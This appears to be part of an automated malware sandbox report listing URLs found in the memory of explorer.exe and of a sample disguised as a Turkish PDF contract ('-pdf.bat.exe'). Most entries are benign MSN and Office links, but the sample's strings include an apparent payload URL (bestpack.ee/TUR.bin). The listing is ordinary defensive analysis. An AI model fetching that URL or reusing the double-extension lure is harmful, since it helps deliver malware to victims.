        Source: explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/currency/svg/light2/greenup.svg
        Source: explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svg
        Source: explorer.exe, 00000005.00000000.25106975292.0000000009091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weathe
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/AAehyQC.png
        Source: explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/AAehyQC.svg
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.png
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/
        Source: explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240908.1/Weather/W06_Clou
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23631950303.00000000027FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bestpack.ee/
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23631950303.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23632177685.0000000002817000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23587200936.0000000002817000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bestpack.ee/TUR.bin
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23631950303.00000000027B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bestpack.ee/TUR.bina
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23631950303.00000000027B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bestpack.ee/TUR.bini
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23631950303.00000000027FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bestpack.ee/gN
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGBm
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGBm-dark
        Source: explorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13D4or-dark
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
        Source: explorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZ
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRtf
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRtf-dark
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gU1v
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gU1v-dark
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13glq1
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13glq1-dark
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090EE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyym
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090EE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyymP
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cntraveler.com/stories/2014-11-22/madison-wisconsin-where-to-eat-stay-play
        Source: explorer.exe, 00000005.00000002.28299456697.0000000010BD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25115051280.0000000010BD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com5u
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://financebuzz.com/stress-free-retirement?utm_source=msn-money&utm_medium=feed&synd_slide=1&syn
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://financebuzz.com/supplement-income-social-security-55mp?utm_source=msn-money&utm_medium=feed&
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090EE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15spNo.img
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA18UlKH.img
        Source: explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1gKAgr.img
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1l5GkZ.img
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1nsFzx.img
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1pkkGI.img
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHfWvR.img
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAU2AGC.img
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAUhLdx.img
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAesHLQ.img
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1nDkpC.img
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWdbbd.img
        Source: explorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBph6Sm.img
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000001.23351565531.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: explorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widget
        Source: explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=04d557f3-74b2-41ba-a75a-06ef
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23536172140.0000000002841000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23436668817.0000000002845000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23536387458.0000000002842000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23535801182.0000000002842000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23632387899.0000000002845000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23535505607.0000000002841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: explorer.exe, 00000005.00000002.28299456697.0000000010BD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25115051280.0000000010BD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com968301
        Source: explorer.exe, 00000005.00000000.25107637245.0000000009395000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28289278020.0000000009395000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEM.W
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wallethub.com/
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wallethub.com/edu/best-places-to-retire/6165
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wallethub.com/profile/chip-lupo-15149105i
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000005.00000003.25842568685.0000000010D72000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.25842218757.0000000010D6E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25115624936.0000000010D78000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28299941018.0000000010D60000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/art
        Source: explorer.exe, 00000005.00000002.28299572214.0000000010C16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25115192518.0000000010C16000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comdo
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.bestplaces.net/docs/datasource.aspx
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.cntraveler.com/destinations/miami?mbid=synd_msn_rss&utm_source=msn&utm_medium=syndicatio
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.cntraveler.com/destinations/orlando?mbid=synd_msn_rss&utm_source=msn&utm_medium=syndicat
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.cntraveler.com/galleries/2016-03-28/the-10-best-beaches-in-florida?mbid=synd_msn_rss&utm
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.cntraveler.com/gallery/best-hotels-resorts-california?mbid=synd_msn_rss&utm_source=msn&u
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.cntraveler.com/newsletter/the-daily?sourceCode=msnsend
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/channel/source/AZ%20Animals%20US/sr-vid-7etr9q8xun6k6508c3nufaum0de3dqktiq
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/feed
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/cookingschool/for-the-best-grilled-clams-avoid-this-fatal-mis
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/recipes/i-asked-3-butchers-how-to-choose-the-best-steak-they-
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/medical/researchers-study-life-after-death-and-it-gets-weirder/ar-A
        Source: explorer.exe, 00000005.00000000.25106975292.0000000009091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/medical/this-might-be-the-easiest-way-to-mak
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/nutrition/i-m-a-dietitian-who-lost-70-lbs-here-are-10-meal-prep-rec
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/other/the-5-carbs-you-should-be-eating-for-insulin-resistance-accor
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/other/vacuum-sealing-certain-foods-could-make-you-sick-here-are-7-t
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/the-10-friendliest-snakes-in-the-world/ss-BB1mW0az
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets?id=a33k6h
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets?id=a3oxnm
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets?id=a6qja2
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/other/elon-musk-says-humans-could-soon-be-heading-to-mars-this-forme
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/other/nvidia-stock-jumps-on-report-ceo-jensen-huang-is-done-selling-
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/tour-of-original-1949-frank-lloyd-wright-home-in-michigan
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/retirement/middle-aged-americans-are-leaving-work-for-months-years-t
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/pelosi-says-cnn-shouldn-t-air-trump-remarks-on-harris-s-cogn
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/rejecting-trump-s-demands-judge-chutkan-reminds-him-who-s-in
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/scientists-probed-a-medieval-alchemist-s-artifacts-and-fou
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090EE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/sen-tuberville-blocks-promotion-of-lloyd-austin-s-top-military-aid
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/18-little-known-facts-about-world-war-ii/ss-BB1nriLY
        Source: explorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/9mwhlgqzrsf2/cg-9mwhlgqzrsf2
        Source: explorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/dinosaurs-merge-master/cg-9n7mhcswnqrj
        Source: explorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/jewel-quest/cg-9nsc1kr9d85l
        Source: explorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/mini-golf-saga/cg-9nqhx1w02dpr
        Source: explorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/penalty-challenge-multiplayer/cg-9pm59hcfhbjx
        Source: explorer.exe, 00000005.00000002.28288382307.0000000009091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/wordmeister/cg-9n48sfvb0c4f
        Source: explorer.exe, 00000005.00000002.28288382307.00000000090F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/nba/don-t-know-what-to-say-phil-jackson-on-pau-gasol-and-matt-barne
        Source: explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/nba/the-really-challenging-ones-were-heavy-and-mechanical-hakeem-ol
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/nba/wnba-attendance-record-shattered-as-20-000-watch-caitlin-clark-
        Source: explorer.exe, 00000005.00000000.25106975292.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/scientists-finally-solve-mystery-behind-bermuda-triangle-disap
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/forecast/in-Prague%2CCapital-City-of-Prague?loc=eyJsIjoiUHJhZ3VlIi
        Source: explorer.exe, 00000005.00000000.25111930720.000000000CDC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28295429173.000000000CDC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/hourlyforecast/in-Prague%2CCapital-City-of-Prague?loc=eyJsIjoiUHJh
